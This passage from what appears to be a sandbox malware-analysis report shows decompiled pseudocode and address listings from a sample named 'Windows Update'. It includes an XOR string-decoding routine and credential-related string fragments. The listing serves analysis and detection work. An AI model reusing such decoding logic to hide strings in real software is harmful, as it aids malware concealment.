													asm("movq [ebp-0x10], xmm0");
													asm("movq xmm0, [0x474890]");
													_t298 = _t338;
													_push(_t324);
													_v216 = _t338;
													_v212 = _t275;
													asm("movq [ebp-0x1c], xmm0");
													_v120 =  *0x474898 & 0x000000ff;
													_v208 = 0;
													_t327 = 0;
													_t320 = _t298 + 1;
													do {
														_t224 =  *_t298;
														_t298 = _t298 + 1;
														__eflags = _t224;
													} while (_t224 != 0);
													__eflags = _t298 != _t320;
													if(_t298 != _t320) {
														_t300 = _t338;
														_t320 = _t300 + 1;
														do {
															_t225 =  *_t300;
															_t300 = _t300 + 1;
															__eflags = _t225;
														} while (_t225 != 0);
														_t301 = _t300 - _t320;
														__eflags = _t301 & 0x00000001;
														if((_t301 & 0x00000001) != 0) {
															goto L57;
														} else {
															__eflags = _a8;
															if(_a8 == 0) {
																_t113 =  &_v24; // 0x9ec40
																E000FC711( &_v100, 0x40, _t113);
																_v101 = 0x5a;
															} else {
																E000FC711( &_v100, 0x40,  &_v36);
																_v101 = 0x71;
															}
															_t359 = _t358 + 0xc;
															 *_t275 = 0;
															_t304 = _t338 + 1;
															do {
																_t231 =  *_t338;
																_t338 = _t338 + 1;
																__eflags = _t231;
															} while (_t231 != 0);
															_t276 = _v124;
															L000FDFDE(_t276, 0x47489c,  &_v112);
															_v112 = _v112 ^ _v101 & 0x000000ff;
															_t360 = _t359 + 0xc;
															_t277 = _t276 + 2;
															_t342 = (_t338 - _t304 >> 1) - 1;
															__eflags = _t342;
															if(_t342 != 0) {
																do {
																	_t342 = _t342 - 1;
																	L000FDFDE(_t277, 0x47489c,  &_v108);
																	_t309 = _v108 ^  *(_t347 + _t327 - 0x5c);
																	_t241 = _v112;
																	_t361 = _t360 + 0xc;
																	_t330 = _t327 + 1;
																	_v108 = _t309;
																	__eflags = _t241 - _t309;
																	if(_t241 >= _t309) {
																		_t309 = _t309 - 1;
																		__eflags = _t309;
																		_v108 = _t309;
																	}
																	_t320 = _v120;
																	_t243 = _v116 + 1;
																	 *((char*)(_v120 + _t243 - 1)) = _t309 - _t241;
																	_v116 = _t243;
																	L000FDFDE(_t277, 0x47489c,  &_v112);
																	_t360 = _t361 + 0xc;
																	_t277 = _t277 + 2;
																	__eflags =  *(_t347 + _t330 - 0x5c);
																	_t327 =  ==  ? 0 : _t330;
																	__eflags = _t342;
																} while (_t342 != 0);
															}
															_pop(_t329);
															 *((char*)(_v120 + _v116)) = 0;
															_pop(_t343);
															__eflags = _v12 ^ _t347;
															return L000FBE87(1, _t277, _v12 ^ _t347, _t320, _t329, _t343);
														}
													} else {
														L57:
														_pop(_t328);
														_pop(_t339);
														__eflags = _v12 ^ _t347;
														return L000FBE87(0, _t275, _v12 ^ _t347, _t320, _t328, _t339);
													}
												} else {
													__eflags = 0;
													 *((short*)(_t346 + _t218 - 0x1010)) = 0;
													swprintf( &_v2580, 0x200, 0x474918,  &_v4116);
													_t349 = _t357 + 0x10;
													goto L21;
												}
											} else {
												__eflags = _t286 - _t336;
												if(_t286 >= _t336) {
													goto L21;
												} else {
													goto L19;
												}
											}
										}
										goto L71;
									}
								}
							}
						} else {
							 *0x47412c();
							_t344 =  *0x474124;
							 *_t344();
							_t267 =  *_t344();
							_t345 = _t322;
							_t331 = _t274;
							__eflags = _v8 ^ _t346;
							return L000FBE87(_t267, _t274, _v8 ^ _t346, _t318, _t331, _t345);
						}
					} else {
						 *0x47412c();
						_t270 =  *0x474124();
						_t332 = _t274;
						__eflags = _v8 ^ _t346;
						return L000FBE87(_t270, _t274, _v8 ^ _t346, _t318, _t332, _t333);
					}
				} else {
					return L000FBE87( *0x47412c(), _t274, _v8 ^ _t346, _t318, _t321, _t333);
				}
				L71:
			}





















































































































                                                                                                                    0x0009ed24
                                                                                                                    0x0009ed30
                                                                                                                    0x0009ed4d
                                                                                                                    0x0009ed4f
                                                                                                                    0x0009ed58
                                                                                                                    0x0009ed81
                                                                                                                    0x0009ed83
                                                                                                                    0x0009ed89
                                                                                                                    0x0009ed8b
                                                                                                                    0x0009edba
                                                                                                                    0x0009edbc
                                                                                                                    0x0009edc2
                                                                                                                    0x0009edc4
                                                                                                                    0x0009edf1
                                                                                                                    0x0009edfb
                                                                                                                    0x0009ee01
                                                                                                                    0x0009ee08
                                                                                                                    0x0009ee0e
                                                                                                                    0x0009f291
                                                                                                                    0x0009f294
                                                                                                                    0x0009f295
                                                                                                                    0x0009f296
                                                                                                                    0x0009f2a1
                                                                                                                    0x0009ee14
                                                                                                                    0x0009ee1c
                                                                                                                    0x0009ee1e
                                                                                                                    0x0009ee20
                                                                                                                    0x0009ee27
                                                                                                                    0x0009ee2e
                                                                                                                    0x0009ee32
                                                                                                                    0x0009ee39
                                                                                                                    0x0009ee40
                                                                                                                    0x0009ee49
                                                                                                                    0x0009ee4b
                                                                                                                    0x0009ee4e
                                                                                                                    0x0009ee54
                                                                                                                    0x0009ee56
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009ee5c
                                                                                                                    0x0009ee5e
                                                                                                                    0x0009ee6b
                                                                                                                    0x0009ee6f
                                                                                                                    0x0009ee73
                                                                                                                    0x0009ee7a
                                                                                                                    0x0009ee81
                                                                                                                    0x0009ee88
                                                                                                                    0x0009ee8f
                                                                                                                    0x0009ee96
                                                                                                                    0x0009ee9d
                                                                                                                    0x0009eea4
                                                                                                                    0x0009eeab
                                                                                                                    0x0009eeb7
                                                                                                                    0x0009eed4
                                                                                                                    0x0009eee6
                                                                                                                    0x0009eee8
                                                                                                                    0x0009eeeb
                                                                                                                    0x0009eeed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009eeef
                                                                                                                    0x0009eef1
                                                                                                                    0x0009eef7
                                                                                                                    0x0009eefc
                                                                                                                    0x0009ef0c
                                                                                                                    0x0009ef11
                                                                                                                    0x0009ef19
                                                                                                                    0x0009ef20
                                                                                                                    0x0009ef21
                                                                                                                    0x0009ef26
                                                                                                                    0x0009eef3
                                                                                                                    0x0009eef3
                                                                                                                    0x0009eef5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009eef5
                                                                                                                    0x0009ef29
                                                                                                                    0x0009ef37
                                                                                                                    0x0009ef39
                                                                                                                    0x0009ef3c
                                                                                                                    0x0009ef3e
                                                                                                                    0x0009ef40
                                                                                                                    0x0009ef42
                                                                                                                    0x0009ef48
                                                                                                                    0x0009ef4d
                                                                                                                    0x0009ef5d
                                                                                                                    0x0009ef62
                                                                                                                    0x0009ef6a
                                                                                                                    0x0009ef71
                                                                                                                    0x0009ef72
                                                                                                                    0x0009ef77
                                                                                                                    0x0009ef44
                                                                                                                    0x0009ef44
                                                                                                                    0x0009ef46
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009ef46
                                                                                                                    0x0009ef42
                                                                                                                    0x0009ef88
                                                                                                                    0x0009ef8a
                                                                                                                    0x0009ef8d
                                                                                                                    0x0009ef8f
                                                                                                                    0x0009eff9
                                                                                                                    0x0009eff9
                                                                                                                    0x0009efff
                                                                                                                    0x0009f002
                                                                                                                    0x0009f002
                                                                                                                    0x0009f004
                                                                                                                    0x0009f005
                                                                                                                    0x0009f005
                                                                                                                    0x0009f00b
                                                                                                                    0x0009f00e
                                                                                                                    0x0009f022
                                                                                                                    0x0009f024
                                                                                                                    0x0009f027
                                                                                                                    0x0009f029
                                                                                                                    0x0009f02b
                                                                                                                    0x0009f02d
                                                                                                                    0x0009f033
                                                                                                                    0x0009f038
                                                                                                                    0x0009f048
                                                                                                                    0x0009f04d
                                                                                                                    0x0009f02f
                                                                                                                    0x0009f02f
                                                                                                                    0x0009f031
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f031
                                                                                                                    0x0009f02d
                                                                                                                    0x0009f061
                                                                                                                    0x0009f066
                                                                                                                    0x0009f06b
                                                                                                                    0x0009f06e
                                                                                                                    0x0009f070
                                                                                                                    0x0009f09c
                                                                                                                    0x0009f09d
                                                                                                                    0x0009f0a2
                                                                                                                    0x0009f0a3
                                                                                                                    0x0009f0ae
                                                                                                                    0x0009f0af
                                                                                                                    0x0009f0b4
                                                                                                                    0x0009f0ba
                                                                                                                    0x0009f0d1
                                                                                                                    0x0009f0d6
                                                                                                                    0x0009f0dc
                                                                                                                    0x0009f0e1
                                                                                                                    0x0009f0e6
                                                                                                                    0x0009f072
                                                                                                                    0x0009f078
                                                                                                                    0x0009f07f
                                                                                                                    0x0009f086
                                                                                                                    0x0009f087
                                                                                                                    0x0009f08c
                                                                                                                    0x0009f091
                                                                                                                    0x0009f091
                                                                                                                    0x0009f070
                                                                                                                    0x0009f0e9
                                                                                                                    0x0009f0ef
                                                                                                                    0x0009f0f2
                                                                                                                    0x0009f0f2
                                                                                                                    0x0009f0f4
                                                                                                                    0x0009f0f5
                                                                                                                    0x0009f0f5
                                                                                                                    0x0009f0fb
                                                                                                                    0x0009f0fe
                                                                                                                    0x0009f112
                                                                                                                    0x0009f114
                                                                                                                    0x0009f117
                                                                                                                    0x0009f119
                                                                                                                    0x0009f11b
                                                                                                                    0x0009f11d
                                                                                                                    0x0009f123
                                                                                                                    0x0009f128
                                                                                                                    0x0009f138
                                                                                                                    0x0009f13d
                                                                                                                    0x0009f11f
                                                                                                                    0x0009f11f
                                                                                                                    0x0009f121
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f121
                                                                                                                    0x0009f11d
                                                                                                                    0x0009f14e
                                                                                                                    0x0009f150
                                                                                                                    0x0009f153
                                                                                                                    0x0009f155
                                                                                                                    0x0009f157
                                                                                                                    0x0009f159
                                                                                                                    0x0009f15f
                                                                                                                    0x0009f164
                                                                                                                    0x0009f174
                                                                                                                    0x0009f179
                                                                                                                    0x0009f15b
                                                                                                                    0x0009f15b
                                                                                                                    0x0009f15d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009f15d
                                                                                                                    0x0009f159
                                                                                                                    0x0009f17c
                                                                                                                    0x0009f182
                                                                                                                    0x0009f18c
                                                                                                                    0x0009f18c
                                                                                                                    0x0009f18e
                                                                                                                    0x0009f18f
                                                                                                                    0x0009f18f
                                                                                                                    0x0009f195
                                                                                                                    0x0009f198
                                                                                                                    0x0009f1ad
                                                                                                                    0x0009f1b2
                                                                                                                    0x0009f1b2
                                                                                                                    0x0009f1c6
                                                                                                                    0x0009f1cb
                                                                                                                    0x0009f1d0
                                                                                                                    0x0009f1d3
                                                                                                                    0x0009f1d5
                                                                                                                    0x0009f201
                                                                                                                    0x0009f202
                                                                                                                    0x0009f207
                                                                                                                    0x0009f208
                                                                                                                    0x0009f213
                                                                                                                    0x0009f214
                                                                                                                    0x0009f219
                                                                                                                    0x0009f21f
                                                                                                                    0x0009f236
                                                                                                                    0x0009f23b
                                                                                                                    0x0009f241
                                                                                                                    0x0009f246
                                                                                                                    0x0009f24b
                                                                                                                    0x0009f1d7
                                                                                                                    0x0009f1dd
                                                                                                                    0x0009f1e4
                                                                                                                    0x0009f1eb
                                                                                                                    0x0009f1ec
                                                                                                                    0x0009f1f1
                                                                                                                    0x0009f1f6
                                                                                                                    0x0009f1f6
                                                                                                                    0x0009f1d5
                                                                                                                    0x0009f24e
                                                                                                                    0x0009f250
                                                                                                                    0x0009f275
                                                                                                                    0x0009f281
                                                                                                                    0x0009f287
                                                                                                                    0x0009f28f
                                                                                                                    0x00000000
                                                                                                                    0x0009f252
                                                                                                                    0x0009f25a
                                                                                                                    0x0009f260
                                                                                                                    0x0009f262
                                                                                                                    0x0009f264
                                                                                                                    0x00000000
                                                                                                                    0x0009f264
                                                                                                                    0x0009ef91
                                                                                                                    0x0009ef91
                                                                                                                    0x0009ef93
                                                                                                                    0x0009ef99
                                                                                                                    0x0009efa0
                                                                                                                    0x0009efa6
                                                                                                                    0x0009efb6
                                                                                                                    0x0009efbb
                                                                                                                    0x0009efc1
                                                                                                                    0x0009efc4
                                                                                                                    0x0009efc9
                                                                                                                    0x0009f2a2
                                                                                                                    0x0009f2a7
                                                                                                                    0x0009f2a8
                                                                                                                    0x0009f2a9
                                                                                                                    0x0009f2aa
                                                                                                                    0x0009f2ab
                                                                                                                    0x0009f2ac
                                                                                                                    0x0009f2ad
                                                                                                                    0x0009f2af
                                                                                                                    0x0009f2b9
                                                                                                                    0x0009f2c3
                                                                                                                    0x0009f2cb
                                                                                                                    0x0009f2cc
                                                                                                                    0x0009f2cf
                                                                                                                    0x0009f2d0
                                                                                                                    0x0009f2d3
                                                                                                                    0x0009f2dd
                                                                                                                    0x0009f2e2
                                                                                                                    0x0009f2ea
                                                                                                                    0x0009f2ec
                                                                                                                    0x0009f2ed
                                                                                                                    0x0009f2f0
                                                                                                                    0x0009f2f3
                                                                                                                    0x0009f2f8
                                                                                                                    0x0009f2fb
                                                                                                                    0x0009f302
                                                                                                                    0x0009f304
                                                                                                                    0x0009f30c
                                                                                                                    0x0009f30c
                                                                                                                    0x0009f30e
                                                                                                                    0x0009f30f
                                                                                                                    0x0009f30f
                                                                                                                    0x0009f313
                                                                                                                    0x0009f315
                                                                                                                    0x0009f32a
                                                                                                                    0x0009f32c
                                                                                                                    0x0009f32f
                                                                                                                    0x0009f32f
                                                                                                                    0x0009f331
                                                                                                                    0x0009f332
                                                                                                                    0x0009f332
                                                                                                                    0x0009f336
                                                                                                                    0x0009f338
                                                                                                                    0x0009f33b
                                                                                                                    0x00000000
                                                                                                                    0x0009f33d
                                                                                                                    0x0009f33d
                                                                                                                    0x0009f340
                                                                                                                    0x0009f357
                                                                                                                    0x0009f361
                                                                                                                    0x0009f366
                                                                                                                    0x0009f342
                                                                                                                    0x0009f34c
                                                                                                                    0x0009f351
                                                                                                                    0x0009f351
                                                                                                                    0x0009f36a
                                                                                                                    0x0009f36d
                                                                                                                    0x0009f370
                                                                                                                    0x0009f373
                                                                                                                    0x0009f373
                                                                                                                    0x0009f375
                                                                                                                    0x0009f376
                                                                                                                    0x0009f376
                                                                                                                    0x0009f37a
                                                                                                                    0x0009f38b
                                                                                                                    0x0009f394
                                                                                                                    0x0009f397
                                                                                                                    0x0009f39a
                                                                                                                    0x0009f39d
                                                                                                                    0x0009f39d
                                                                                                                    0x0009f39e
                                                                                                                    0x0009f3a0
                                                                                                                    0x0009f3aa
                                                                                                                    0x0009f3ab
                                                                                                                    0x0009f3b8
                                                                                                                    0x0009f3ba
                                                                                                                    0x0009f3bd
                                                                                                                    0x0009f3c0
                                                                                                                    0x0009f3c1
                                                                                                                    0x0009f3c4
                                                                                                                    0x0009f3c6
                                                                                                                    0x0009f3c8
                                                                                                                    0x0009f3c8
                                                                                                                    0x0009f3c9
                                                                                                                    0x0009f3c9
                                                                                                                    0x0009f3cc
                                                                                                                    0x0009f3d4
                                                                                                                    0x0009f3d5
                                                                                                                    0x0009f3d9
                                                                                                                    0x0009f3e6
                                                                                                                    0x0009f3ed
                                                                                                                    0x0009f3f0
                                                                                                                    0x0009f3f3
                                                                                                                    0x0009f3f7
                                                                                                                    0x0009f3fa
                                                                                                                    0x0009f3fa
                                                                                                                    0x0009f3a0
                                                                                                                    0x0009f404
                                                                                                                    0x0009f405
                                                                                                                    0x0009f40c
                                                                                                                    0x0009f40d
                                                                                                                    0x0009f41d
                                                                                                                    0x0009f41d
                                                                                                                    0x0009f317
                                                                                                                    0x0009f317
                                                                                                                    0x0009f317
                                                                                                                    0x0009f318
                                                                                                                    0x0009f31f
                                                                                                                    0x0009f329
                                                                                                                    0x0009f329
                                                                                                                    0x0009efcf
                                                                                                                    0x0009efcf
                                                                                                                    0x0009efd1
                                                                                                                    0x0009eff1
                                                                                                                    0x0009eff6
                                                                                                                    0x00000000
                                                                                                                    0x0009eff6
                                                                                                                    0x0009ef95
                                                                                                                    0x0009ef95
                                                                                                                    0x0009ef97
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0009ef97
                                                                                                                    0x0009ef93
                                                                                                                    0x00000000
                                                                                                                    0x0009ef8f
                                                                                                                    0x0009ee5c
                                                                                                                    0x0009ee56
                                                                                                                    0x0009edc6
                                                                                                                    0x0009edc6
                                                                                                                    0x0009edcc
                                                                                                                    0x0009edd3
                                                                                                                    0x0009edd6
                                                                                                                    0x0009edd8
                                                                                                                    0x0009edd9
                                                                                                                    0x0009edde
                                                                                                                    0x0009ede8
                                                                                                                    0x0009ede8
                                                                                                                    0x0009ed8d
                                                                                                                    0x0009ed8d
                                                                                                                    0x0009ed94
                                                                                                                    0x0009ed9a
                                                                                                                    0x0009ed9f
                                                                                                                    0x0009eda9
                                                                                                                    0x0009eda9
                                                                                                                    0x0009ed5a
                                                                                                                    0x0009ed6e
                                                                                                                    0x0009ed6e
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: d$ount$swor
                                                                                                                    • API String ID: 0-2708979977
                                                                                                                    • Opcode ID: f6747af9571bbc8c743756932be27fcdb4a06f87799fb2c41568f3d21dbbf40a
                                                                                                                    • Instruction ID: 96dedbef22b6947cf983f06a9eb1d8e37f463bab25f6b9a8229d0134df55ee1c
                                                                                                                    • Opcode Fuzzy Hash: f6747af9571bbc8c743756932be27fcdb4a06f87799fb2c41568f3d21dbbf40a
                                                                                                                    • Instruction Fuzzy Hash: E9E1F77194021DAADF20EBA0CC46FFE77ACAF54700F1404EAF619E6183D7B59B849B94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0007AC3B Relevance: 16.8, APIs: 11, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E0007AC3B(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t100;
				signed int _t102;
				void* _t103;
				signed int _t106;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int _t142;
				signed int _t148;
				signed int* _t151;
				signed int _t155;
				signed int _t159;
				void* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t166;
				void* _t171;
				signed int _t174;
				signed int _t183;
				unsigned int _t184;
				signed int _t188;
				signed int* _t201;
				signed int _t203;
				signed int _t207;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				void* _t214;
				void* _t216;
				signed int _t217;
				signed int _t218;

				_t183 = __edx;
				_t201 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(_t201 != 0) {
					E00077C87(_t201, 0xff, 0x24);
					_t207 = _a8;
					__eflags = _t207;
					if(_t207 == 0) {
						goto L1;
					} else {
						__eflags =  *(_t207 + 4);
						if(__eflags > 0) {
							L9:
							_t103 = 7;
							__eflags =  *(_t207 + 4) - _t103;
							if(__eflags < 0) {
								L12:
								E000828A4(0, _t183, _t201, _t207, __eflags);
								_t106 = E000825FD( &_v12);
								__eflags = _t106;
								if(_t106 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E0007C6A6(_t106, 0, _t183);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t201);
									_push(_t207);
									_push(0);
									_t203 = 0;
									_t109 = _v48;
									__eflags = _t109;
									if(_t109 < 0) {
										_t203 = 1;
										__eflags = 1;
										asm("sbb eax, 0x0");
										_v48 =  ~_t109;
										_v52 =  ~_v52;
									}
									_t111 = _v40;
									__eflags = _t111;
									if(_t111 < 0) {
										_t203 = _t203 + 1;
										__eflags = _t203;
										_t111 =  ~_t111;
										asm("sbb eax, 0x0");
										_v40 = _t111;
										_v44 =  ~_v44;
									}
									_t112 = _t111;
									__eflags = _t112;
									if(_t112 != 0) {
										_t155 = _t112;
										_t166 = _v44;
										_t184 = _v48;
										_t113 = _v52;
										do {
											asm("rcr ecx, 1");
											_t184 = _t184 >> 1;
											asm("rcr eax, 1");
											_t155 = _t155 >> 1;
											__eflags = _t155;
										} while (_t155 != 0);
										_t114 = _t113 / _t166;
										_t210 = _t114;
										_t116 = _v44;
										_t117 = _t116 * _t210;
										_t188 = (_t116 * _t210 >> 0x20) + _t114 * _v40;
										__eflags = _t188;
										if(_t188 < 0) {
											L58:
											_t210 = _t210 - 1;
											__eflags = _t210;
										} else {
											__eflags = _t188 - _v48;
											if(__eflags > 0) {
												goto L58;
											} else {
												if(__eflags >= 0) {
													__eflags = _t117 - _v52;
													if(_t117 > _v52) {
														goto L58;
													}
												}
											}
										}
										__eflags = 0;
										_t118 = _t210;
									} else {
										_t118 = _v52 / _v44;
									}
									__eflags = _t203 == 1;
									if(_t203 == 1) {
										_t118 =  ~_t118;
										asm("sbb edx, 0x0");
									}
									return _t118;
								} else {
									_t106 = E00082627( &_v16);
									__eflags = _t106;
									if(_t106 != 0) {
										goto L45;
									} else {
										_t106 = E00082651( &_v8);
										__eflags = _t106;
										if(_t106 != 0) {
											goto L45;
										} else {
											_t159 =  *(_t207 + 4);
											_t171 =  *_t207;
											__eflags = _t159;
											if(__eflags < 0) {
												L23:
												_t102 = E0008267B(_t201, _t207);
												__eflags = _t102;
												if(_t102 == 0) {
													__eflags = _v12 - _t102;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t212 = _t183;
														asm("cdq");
														_t161 =  *_t201 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t201);
														_t142 = E000828F4(_t159, _t201, _t207, __eflags);
														__eflags = _t142;
														if(_t142 == 0) {
															goto L27;
														} else {
															_t201[8] = 1;
															asm("cdq");
															asm("cdq");
															_t161 =  *_t201 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t183;
															_t212 = _t183;
														}
													}
													_t127 = E0007B087(_t161, _t212, 0x3c, 0);
													 *_t201 = _t127;
													__eflags = _t127;
													if(_t127 < 0) {
														_t127 = _t127 + 0x3c;
														_t161 = _t161 + 0xffffffc4;
														 *_t201 = _t127;
														asm("adc esi, 0xffffffff");
													}
													_push(0);
													_push(0x3c);
													_push(_t212);
													_push(_t161);
													L46();
													_t162 = _t183;
													asm("cdq");
													_t214 = _t127 + _t201[1];
													asm("adc ebx, edx");
													_t129 = E0007B087(_t214, _t162, 0x3c, 0);
													_t201[1] = _t129;
													__eflags = _t129;
													if(_t129 < 0) {
														_t129 = _t129 + 0x3c;
														_t214 = _t214 + 0xffffffc4;
														_t201[1] = _t129;
														asm("adc ebx, 0xffffffff");
													}
													_push(0);
													_push(0x3c);
													_push(_t162);
													_push(_t214);
													L46();
													_t163 = _t183;
													asm("cdq");
													_t216 = _t129 + _t201[2];
													asm("adc ebx, edx");
													_t131 = E0007B087(_t216, _t163, 0x18, 0);
													_t201[2] = _t131;
													__eflags = _t131;
													if(_t131 < 0) {
														_t131 = _t131 + 0x18;
														_t216 = _t216 + 0xffffffe8;
														_t201[2] = _t131;
														asm("adc ebx, 0xffffffff");
													}
													_push(0);
													_push(0x18);
													_push(_t163);
													_push(_t216);
													L46();
													_t174 = _t131;
													__eflags = _t183;
													if(__eflags < 0) {
														L43:
														asm("cdq");
														_t217 = 7;
														_t201[3] = _t201[3] + _t174;
														_t136 = _t201[3];
														_t201[6] = (_t201[6] + 7 + _t174) % _t217;
														__eflags = _t136;
														if(_t136 > 0) {
															goto L38;
														} else {
															_t201[3] = _t136 + 0x1f;
															_t54 = _t174 + 0x16d; // 0x16d
															_t201[7] = _t201[7] + _t54;
															_t201[5] = _t201[5] - 1;
															_t201[4] = 0xb;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t218 = 7;
															_t39 =  &(_t201[3]);
															 *_t39 = _t201[3] + _t174;
															__eflags =  *_t39;
															_t201[6] = (_t201[6] + _t174) % _t218;
															L38:
															_t42 =  &(_t201[7]);
															 *_t42 = _t201[7] + _t174;
															__eflags =  *_t42;
														} else {
															__eflags = _t174;
															if(_t174 == 0) {
																__eflags = _t183;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t174;
																		if(_t174 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t171 - _v8;
													_v20 = _t159;
													_t102 = E0008267B(_t201,  &_v24);
													__eflags = _t102;
													if(_t102 == 0) {
														__eflags = _v12 - _t102;
														if(__eflags == 0) {
															L39:
															_t102 = 0;
														} else {
															_push(_t201);
															_t148 = E000828F4(_t159, _t201, _t207, __eflags);
															__eflags = _t148;
															if(_t148 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t102 = E0008267B(_t201,  &_v24);
																__eflags = _t102;
																if(_t102 == 0) {
																	_t201[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t171 - 0x3f480;
													if(_t171 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t207 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t151 = E0007C705();
								_t208 = 0x16;
								 *_t151 = _t208;
								goto L2;
							} else {
								__eflags =  *_t207;
								if( *_t207 >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t100 = E0007C705();
					_t208 = 0x16;
					 *_t100 = _t208;
					E0007C696();
					L2:
					_t102 = _t208;
					L3:
					return _t102;
				}
			}























































                                                                                                                    0x0007ac3b
                                                                                                                    0x0007ac46
                                                                                                                    0x0007ac49
                                                                                                                    0x0007ac4c
                                                                                                                    0x0007ac4f
                                                                                                                    0x0007ac54
                                                                                                                    0x0007ac74
                                                                                                                    0x0007ac79
                                                                                                                    0x0007ac7f
                                                                                                                    0x0007ac81
                                                                                                                    0x00000000
                                                                                                                    0x0007ac83
                                                                                                                    0x0007ac83
                                                                                                                    0x0007ac86
                                                                                                                    0x0007ac9a
                                                                                                                    0x0007ac9c
                                                                                                                    0x0007ac9d
                                                                                                                    0x0007aca0
                                                                                                                    0x0007acac
                                                                                                                    0x0007acac
                                                                                                                    0x0007acb5
                                                                                                                    0x0007acbb
                                                                                                                    0x0007acbd
                                                                                                                    0x0007aea8
                                                                                                                    0x0007aea8
                                                                                                                    0x0007aea9
                                                                                                                    0x0007aeaa
                                                                                                                    0x0007aeab
                                                                                                                    0x0007aeac
                                                                                                                    0x0007aead
                                                                                                                    0x0007aeb2
                                                                                                                    0x0007aeb3
                                                                                                                    0x0007aeb4
                                                                                                                    0x0007aeb5
                                                                                                                    0x0007aeb6
                                                                                                                    0x0007aeb7
                                                                                                                    0x0007aeb8
                                                                                                                    0x0007aeb9
                                                                                                                    0x0007aeba
                                                                                                                    0x0007aec0
                                                                                                                    0x0007aec0
                                                                                                                    0x0007aec2
                                                                                                                    0x0007aec4
                                                                                                                    0x0007aec4
                                                                                                                    0x0007aecd
                                                                                                                    0x0007aed0
                                                                                                                    0x0007aed4
                                                                                                                    0x0007aed4
                                                                                                                    0x0007aedc
                                                                                                                    0x0007aedc
                                                                                                                    0x0007aede
                                                                                                                    0x0007aee0
                                                                                                                    0x0007aee0
                                                                                                                    0x0007aee5
                                                                                                                    0x0007aee9
                                                                                                                    0x0007aeec
                                                                                                                    0x0007aef0
                                                                                                                    0x0007aef0
                                                                                                                    0x0007aef4
                                                                                                                    0x0007aef4
                                                                                                                    0x0007aef6
                                                                                                                    0x0007af10
                                                                                                                    0x0007af12
                                                                                                                    0x0007af16
                                                                                                                    0x0007af1a
                                                                                                                    0x0007af1e
                                                                                                                    0x0007af20
                                                                                                                    0x0007af22
                                                                                                                    0x0007af24
                                                                                                                    0x0007af26
                                                                                                                    0x0007af26
                                                                                                                    0x0007af26
                                                                                                                    0x0007af2a
                                                                                                                    0x0007af2c
                                                                                                                    0x0007af34
                                                                                                                    0x0007af38
                                                                                                                    0x0007af3a
                                                                                                                    0x0007af3a
                                                                                                                    0x0007af3c
                                                                                                                    0x0007af4c
                                                                                                                    0x0007af4c
                                                                                                                    0x0007af4c
                                                                                                                    0x0007af3e
                                                                                                                    0x0007af3e
                                                                                                                    0x0007af42
                                                                                                                    0x00000000
                                                                                                                    0x0007af44
                                                                                                                    0x0007af44
                                                                                                                    0x0007af46
                                                                                                                    0x0007af4a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0007af4a
                                                                                                                    0x0007af44
                                                                                                                    0x0007af42
                                                                                                                    0x0007af4d
                                                                                                                    0x0007af4f
                                                                                                                    0x0007aef8
                                                                                                                    0x0007af0a
                                                                                                                    0x0007af0c
                                                                                                                    0x0007af51
                                                                                                                    0x0007af52
                                                                                                                    0x0007af56
                                                                                                                    0x0007af58
                                                                                                                    0x0007af58
